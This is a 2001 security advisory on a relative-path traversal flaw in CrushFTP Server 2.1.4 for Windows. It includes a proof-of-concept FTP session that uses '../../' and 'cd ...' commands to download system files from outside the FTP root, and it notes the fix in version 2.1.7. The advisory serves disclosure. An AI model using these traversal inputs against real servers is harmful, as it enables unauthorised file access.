Crush FTP Relative Path Vulnerability

Reported May 3, 2001, by JoeTesta.

VERSIONS AFFECTED

·        CrushFTP Server 2.1.4 for Windows 2000, Windows NT, WindowsMe, and Windows 9x

DESCRIPTION

Avulnerability exists that lets an attacker break out of an FTP root. Forexample, by connecting to a vulnerable host and issuing the change directory(CD) command, an attacker can access the root directory where the FTP server isrunning. An attacker can also use relative paths to download files outside of anFTP root.

DEMONSTRATION

Joe Testa also provided the followingproof-of-concept scenario:

The following is anillustration of the problem.  An ftproot of

"c:directorydirectory"was used.

>ftp localhost

Connected toxxxxxxxxxx.rh.rit.edu.

220-Welcome to CrushFTP!

220 CrushFTP Server Ready.

User (xxxxxxxxxx.rh.rit.edu:(none)):jdog

331 Username OK. Need password.

Password:

230-Welcome!

230 Password OK. Connected.

ftp> get ../../autoexec.bat

200 PORT command successful.127.0.0.1:1868

150 Opening ASCII mode dataconnection for ../../autoexec.bat (419 bytes).

226-Download File Size:419bytes @ 0K/sec.

226 Transfer complete.

ftp: 419 bytes received in0.00Seconds 419000.00Kbytes/sec.

ftp> cd ...

250 "/.../" CWDcommand successful.

ftp> get command.com

200 PORT command successful.127.0.0.1:1870

150 Opening ASCII mode dataconnection for command.com (93890 bytes).

226-Download File Size:93890bytes @ 92K/sec.

226 Transfer complete.

ftp: 94570 bytes received in1.86Seconds 50.84Kbytes/sec.

VENDOR RESPONSE

Theprogram author, Ben Spink, has released version2.1.7, which is not subject to thisvulnerability.

CREDIT

Discovered by JoeTesta.